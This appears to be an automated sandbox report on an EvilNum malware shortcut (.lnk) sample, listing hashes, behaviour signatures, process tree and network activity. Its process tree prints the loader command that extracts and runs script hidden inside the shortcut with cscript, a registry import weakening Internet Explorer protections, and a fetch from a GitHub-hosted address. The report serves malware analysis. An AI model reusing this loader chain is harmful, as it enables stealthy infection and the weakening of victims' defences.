Analysis

  • max time kernel
    153s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    04/02/2022, 08:41 UTC

General

  • Target

    0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk

  • Size

    33KB

  • MD5

    219dedb53da6b1dce0d6c071af59b45c

  • SHA1

    650deb9baff4b7564146222deb555e77d5cbbe36

  • SHA256

    0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc

  • SHA512

    dfb89f58f70aa56b7dc681d01626f59c76c2d1bfa777f49b0ec0885c8122fe48e8fd88a92bc5879643b10a17ee709946871004f88187b6e56cca39be915c2e0a

Malware Config

Signatures

  • EvilNum C# Component 2 IoCs
  • EvilNum JS Component 2 IoCs
  • Evilnum

    A malware family with multiple components distributed through LNK files.

  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer Automatic Crash Recovery 1 TTPs 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 1 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 47 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\WINDOWS\system32\cmd.exe
      "C:\WINDOWS\system32\cmd.exe" /c copy 2*.lnk C:\Users\Admin\AppData\Local\Temp&C:&cd C:\Users\Admin\AppData\Local\Temp&attrib +r *.lnk&for /f "delims=" %a in ('dir /s /b *.LnK') do type "%~fa" | find "p0b2x6">.js &CsCRipt .js "%~fa"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3892
      • C:\Windows\system32\attrib.exe
        attrib +r *.lnk
        3⤵
        • Views/modifies file attributes
        PID:3780
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c dir /s /b *.LnK
        3⤵
        PID:644
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk" "
        3⤵
        PID:480
      • C:\Windows\system32\find.exe
        find "p0b2x6"
        3⤵
        PID:396
      • C:\Windows\system32\cscript.exe
        CsCRipt .js "C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2528
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c 200_Germany.csv
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1136
          • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
            "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\200_Germany.csv"
            5⤵
            PID:3560
        • C:\Windows\System32\cscript.exe
          "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\file.js
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1868
          • C:\Windows\System32\cscript.exe
            "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\kill.js
            5⤵
            PID:1620
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\g3r.reg
            5⤵
            • Modifies Internet Explorer Automatic Crash Recovery
            • Modifies Internet Explorer Phishing Filter
            • Modifies Internet Explorer Protected Mode
            • Modifies Internet Explorer Protected Mode Banner
            • Modifies Internet Explorer settings
            PID:540
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
    PID:3764
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:220
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:220 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:3760
  • C:\Windows\system32\MusNotifyIcon.exe
    %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
    1⤵
    • Checks processor information in registry
    PID:3872
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe 798d2b5301d19e9cab21e678228390d6 CH6w7teuu0eD8V7P0UJRQw.0.1.0.0.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:3492
  • C:\Windows\system32\MusNotifyIcon.exe
    %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
    1⤵
    • Checks processor information in registry
    PID:3248
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -p
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    PID:116

Network

  • DNS [US] settings-win.data.microsoft.com
    Remote address: 8.8.8.8:53
    Request: settings-win.data.microsoft.com IN A
    Response: settings-win.data.microsoft.com IN CNAME settingsfd-geo.trafficmanager.net
              settingsfd-geo.trafficmanager.net IN A 51.124.78.146
  • DNS [US] settings-win.data.microsoft.com
    Remote address: 8.8.8.8:53
    Request: settings-win.data.microsoft.com IN A
    Response: settings-win.data.microsoft.com IN CNAME settingsfd-geo.trafficmanager.net
              settingsfd-geo.trafficmanager.net IN A 52.167.249.196
  • DNS [US] raw.githubusercontent.com (IEXPLORE.EXE)
    Remote address: 8.8.8.8:53
    Request: raw.githubusercontent.com IN A
    Response: raw.githubusercontent.com IN A 185.199.108.133
              raw.githubusercontent.com IN A 185.199.109.133
              raw.githubusercontent.com IN A 185.199.110.133
              raw.githubusercontent.com IN A 185.199.111.133
  • DNS [US] geo.prod.do.dsp.mp.microsoft.com (NetworkService)
    Remote address: 8.8.8.8:53
    Request: geo.prod.do.dsp.mp.microsoft.com IN A
    Response: geo.prod.do.dsp.mp.microsoft.com IN CNAME geo.prod.do.dsp.trafficmanager.net
              geo.prod.do.dsp.trafficmanager.net IN CNAME array809.prod.do.dsp.mp.microsoft.com
              array809.prod.do.dsp.mp.microsoft.com IN A 40.91.73.169
  • DNS [US] kv801.prod.do.dsp.mp.microsoft.com (NetworkService)
    Remote address: 8.8.8.8:53
    Request: kv801.prod.do.dsp.mp.microsoft.com IN A
    Response: kv801.prod.do.dsp.mp.microsoft.com IN CNAME kv801.prod.do.dsp.mp.microsoft.com.edgekey.net
              kv801.prod.do.dsp.mp.microsoft.com.edgekey.net IN CNAME e12437.g.akamaiedge.net
              e12437.g.akamaiedge.net IN A 184.29.205.60
  • GET [NL] https://kv801.prod.do.dsp.mp.microsoft.com/all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1 (NetworkService)
    Remote address: 184.29.205.60:443
    Request:
      GET /all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1 HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Microsoft-Delivery-Optimization/10.0
      MS-CV: G4Aui0DO5UCt8Qvk.2.1.1
      Content-Length: 0
      Host: kv801.prod.do.dsp.mp.microsoft.com
    Response:
      HTTP/1.1 200 OK
      Content-Type: text/json
      Server: Microsoft-IIS/10.0
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Content-Length: 808
      Cache-Control: max-age=687
      Date: Fri, 04 Feb 2022 08:57:14 GMT
      Connection: keep-alive
  • DNS [US] settings-win.data.microsoft.com
    Remote address: 8.8.8.8:53
    Request: settings-win.data.microsoft.com IN A
    Response: settings-win.data.microsoft.com IN CNAME settingsfd-geo.trafficmanager.net
              settingsfd-geo.trafficmanager.net IN A 52.167.17.97
  • GET [US] https://raw.githubusercontent.com/deadpooool/news/master/README.md (IEXPLORE.EXE)
    Remote address: 185.199.108.133:443
    Request:
      GET /deadpooool/news/master/README.md HTTP/2.0
      host: raw.githubusercontent.com
      accept: text/html, application/xhtml+xml, image/jxr, */*
      accept-language: en-US
      user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
      accept-encoding: gzip, deflate
    Response:
      HTTP/2.0 404
      content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      strict-transport-security: max-age=31536000
      x-content-type-options: nosniff
      x-frame-options: deny
      x-xss-protection: 1; mode=block
      content-type: text/plain; charset=utf-8
      x-github-request-id: A8E2:BA8B:AB422B:B6FB9D:61FCEA4D
      accept-ranges: bytes
      date: Fri, 04 Feb 2022 08:57:23 GMT
      via: 1.1 varnish
      x-served-by: cache-ams21041-AMS
      x-cache: HIT
      x-cache-hits: 1
      x-timer: S1643965044.663079,VS0,VE0
      vary: Authorization,Accept-Encoding,Origin
      access-control-allow-origin: *
      x-fastly-request-id: d70258487a9cdd44ee916d953c190e9e9f4ce2ca
      expires: Fri, 04 Feb 2022 09:02:23 GMT
      source-age: 38
      content-length: 14

Connections

  • 92.123.77.73:80 | 322 B | 7
  • 104.110.191.140:80 | 322 B | 7
  • 51.124.78.146:443 | settings-win.data.microsoft.com | tls, https | 2.1kB | 4.6kB | 13 | 12
  • 51.124.78.146:443 | settings-win.data.microsoft.com | tls, https | 1.6kB | 4.4kB | 12 | 10
  • 51.124.78.146:443 | settings-win.data.microsoft.com | tls, https | 1.8kB | 4.4kB | 12 | 10
  • 93.184.221.240:80 | 322 B | 7
  • 72.21.91.29:80 | 322 B | 7
  • 52.167.249.196:443 | settings-win.data.microsoft.com | tls, https | 2.6kB | 8.0kB | 15 | 15
  • 40.91.73.169:443 | geo.prod.do.dsp.mp.microsoft.com | tls, https | NetworkService | 1.2kB | 3.5kB | 12 | 9
  • 184.29.205.60:443 | https://kv801.prod.do.dsp.mp.microsoft.com/all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1 | tls, http | NetworkService | 1.0kB | 7.7kB | 8 | 11
    HTTP request: GET https://kv801.prod.do.dsp.mp.microsoft.com/all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1
    HTTP response: 200
  • 52.167.17.97:443 | settings-win.data.microsoft.com | tls, https | 1.3kB | 4.4kB | 12 | 10
  • 185.199.108.133:443 | https://raw.githubusercontent.com/deadpooool/news/master/README.md | tls, http2 | IEXPLORE.EXE | 1.2kB | 5.3kB | 13 | 12
    HTTP request: GET https://raw.githubusercontent.com/deadpooool/news/master/README.md
    HTTP response: 404
  • 185.199.108.133:443 | raw.githubusercontent.com | tls, http2 | IEXPLORE.EXE | 916 B | 4.7kB | 11 | 10
  • 8.8.8.8:53 | settings-win.data.microsoft.com | dns | 77 B | 140 B | 1 | 1
    DNS request: settings-win.data.microsoft.com
    DNS response: 51.124.78.146
  • 8.8.8.8:53 | settings-win.data.microsoft.com | dns | 77 B | 140 B | 1 | 1
    DNS request: settings-win.data.microsoft.com
    DNS response: 52.167.249.196
  • 8.8.8.8:53 | raw.githubusercontent.com | dns | IEXPLORE.EXE | 71 B | 135 B | 1 | 1
    DNS request: raw.githubusercontent.com
    DNS response: 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133
  • 8.8.8.8:53 | geo.prod.do.dsp.mp.microsoft.com | dns | NetworkService | 78 B | 165 B | 1 | 1
    DNS request: geo.prod.do.dsp.mp.microsoft.com
    DNS response: 40.91.73.169
  • 8.8.8.8:53 | kv801.prod.do.dsp.mp.microsoft.com | dns | NetworkService | 80 B | 190 B | 1 | 1
    DNS request: kv801.prod.do.dsp.mp.microsoft.com
    DNS response: 184.29.205.60
  • 8.8.8.8:53 | settings-win.data.microsoft.com | dns | 77 B | 140 B | 1 | 1
    DNS request: settings-win.data.microsoft.com
    DNS response: 52.167.17.97

MITRE ATT&CK Enterprise v6

Downloads

  • memory/3560-458-0x00007FF99B410000-0x00007FF99B420000-memory.dmp (Filesize: 64KB)
  • memory/3560-459-0x00007FF99B410000-0x00007FF99B420000-memory.dmp (Filesize: 64KB)
  • memory/3560-460-0x00007FF99B410000-0x00007FF99B420000-memory.dmp (Filesize: 64KB)
  • memory/3560-461-0x00007FF99B410000-0x00007FF99B420000-memory.dmp (Filesize: 64KB)
  • memory/3560-462-0x00007FF99B410000-0x00007FF99B420000-memory.dmp (Filesize: 64KB)
